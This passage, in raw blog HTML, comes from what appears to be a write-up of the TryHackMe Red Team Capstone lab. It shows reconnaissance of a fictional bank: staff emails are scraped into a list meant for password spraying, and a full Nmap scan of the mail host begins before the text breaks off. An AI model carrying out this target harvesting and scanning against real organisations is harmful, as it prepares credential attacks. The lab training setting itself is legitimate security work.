class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091025fd&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091025fd\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"533\" data-attachment-id=\"453\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206090632\/\" 
data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?fit=1909%2C993&amp;ssl=1\" data-orig-size=\"1909,993\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206090632\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?fit=1024%2C533&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?resize=1024%2C533&#038;ssl=1\" alt=\"\" class=\"wp-image-453\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?resize=1024%2C533&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?resize=300%2C156&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?resize=768%2C399&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?resize=1536%2C799&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090632.png?w=1909&amp;ssl=1 1909w\" 
sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The landing page is the homepage of TheReserve Bank of Trimento. Going to the <code>Meet The Team<\/code> tab, we see that some of the users are listed there.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09102c51&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09102c51\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"727\" data-attachment-id=\"454\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206090754\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?fit=1783%2C1265&amp;ssl=1\" data-orig-size=\"1783,1265\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206090754\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?fit=1024%2C727&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?resize=1024%2C727&#038;ssl=1\" alt=\"\" class=\"wp-image-454\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?resize=1024%2C727&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?resize=300%2C213&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?resize=768%2C545&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?resize=1536%2C1090&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206090754.png?w=1783&amp;ssl=1 1783w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>By opening the picture in a new tab, we see the naming convention of the (potential) domain users.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910323e&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910323e\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1008\" height=\"1024\" data-attachment-id=\"455\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/image-22-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-22.png?fit=1189%2C1208&amp;ssl=1\" data-orig-size=\"1189,1208\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-22\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-22.png?fit=1008%2C1024&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-22.png?resize=1008%2C1024&#038;ssl=1\" alt=\"\" class=\"wp-image-455\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-22.png?resize=1008%2C1024&amp;ssl=1 1008w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-22.png?resize=295%2C300&amp;ssl=1 295w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-22.png?resize=768%2C780&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-22.png?w=1189&amp;ssl=1 1189w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>If we go to the <code>\/images<\/code> directory, we can see a list of all the users.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091039be&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091039be\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1023\" height=\"846\" data-attachment-id=\"554\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/images-directory\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/images-directory.png?fit=1023%2C846&amp;ssl=1\" data-orig-size=\"1023,846\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"images-directory\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/images-directory.png?fit=1023%2C846&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" 
data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/images-directory.png?resize=1023%2C846&#038;ssl=1\" alt=\"\" class=\"wp-image-554\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/images-directory.png?w=1023&amp;ssl=1 1023w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/images-directory.png?resize=300%2C248&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/images-directory.png?resize=768%2C635&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Based on this list, we can create a user list that we can use later to enumerate or carry out other attacks such as password spraying and brute-forcing.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" 
style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cat<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">emails.txt<\/span><span style=\"color: #BABED8\">    <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">antony.ross@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">ashley.chan@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">brenda.henderson@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">charlene.thomas@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">christopher.smith@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">emily.harvey@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">keith.allen@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">laura.wood@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">leslie.morley@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">lynda.gordon@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#FFCB6B\">martin.savage@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">mohammad.ahmed@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">paula.bailey@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">rhys.parsons@corp.thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">roy.sims@corp.thereserve.loc<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The <code>Contact Us<\/code> page has a couple more usernames. We will add them to our list.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091040fd&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091040fd\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"556\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/contact-us\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/contact-us.png?fit=1422%2C800&amp;ssl=1\" data-orig-size=\"1422,800\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"contact-us\" data-image-description=\"\" data-image-caption=\"\" 
data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/contact-us.png?fit=1024%2C576&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/contact-us.png?resize=1024%2C576&#038;ssl=1\" alt=\"\" class=\"wp-image-556\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/contact-us.png?resize=1024%2C576&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/contact-us.png?resize=300%2C169&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/contact-us.png?resize=768%2C432&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/contact-us.png?w=1422&amp;ssl=1 1422w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We have gathered some useful data from the web server. 
The usernames\/emails could belong to domain users, and we can use them on other machines to perform different attacks.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"12-mail-machine-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Mail Machine<\/mark><\/h3>\n\n\n\n<p>We will again start by running Nmap on this machine. From the network diagram, we can see that this is a Windows host connected directly to the domain. If we can enumerate it and gather any interesting information, we should be able to get a foothold on the network.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone\/Mail<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span
class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mail.thereserve.loc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-A<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap\/mail-fullscan<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Starting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7.94<\/span><span style=\"color: #C3E88D\">SVN<\/span><span style=\"color: #BABED8\"> ( <\/span><span style=\"color: #C3E88D\">https:\/\/nmap.org<\/span><span style=\"color: #BABED8\"> ) at 2024-02-06 11:14 CST<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Unable<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">split<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">netmask<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">from<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">target<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">expression:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">nmap\/mail-fullscan<\/span><span style=\"color: #89DDFF\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">scan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">report<\/span><span style=\"color: 
#BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mail.thereserve.loc<\/span><span style=\"color: #BABED8\"> (10.200.113.11)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">up<\/span><span style=\"color: #BABED8\"> (0.21s <\/span><span style=\"color: #C3E88D\">latency<\/span><span style=\"color: #BABED8\">).<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">shown:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">65513<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">closed<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ports<\/span><span style=\"color: #BABED8\"> (conn-refused)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">PORT<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">STATE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SERVICE<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">VERSION<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">22\/tcp<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #BABED8\">           <\/span><span style=\"color: #C3E88D\">OpenSSH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for_Windows_7.7<\/span><span style=\"color: #BABED8\"> (protocol <\/span><span style=\"color: 
#F78C6C\">2.0<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssh-hostkey:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">2048<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">f3:6c:52:d2:7f:e9:0e:1c:c1:c7:ac:96:2c:d1:ec:2d<\/span><span style=\"color: #BABED8\"> (RSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">c2:56:3c:ed:c4:b0:69:a8:e7:ad:3c:31:05:05:e9:85<\/span><span style=\"color: #BABED8\"> (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">d3:e5:f0:73:75:d5:20:d9:c0:bb:41:99:e7:af:a0:00<\/span><span style=\"color: #BABED8\"> (ED25519)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">25\/tcp<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">smtp<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">hMailServer<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">smtpd<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">smtp-commands:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MAIL,<\/span><span style=\"color: #BABED8\"> 
<\/span><span style=\"color: #C3E88D\">SIZE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">20480000<\/span><span style=\"color: #C3E88D\">,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">AUTH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LOGIN,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HELP<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">211<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DATA<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">HELO<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">EHLO<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MAIL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">NOOP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">QUIT<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RCPT<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RSET<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SAML<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TURN<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">VRFY<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">80\/tcp<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">http<\/span><span style=\"color: #BABED8\">          <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IIS<\/span><span style=\"color: #BABED8\"> 
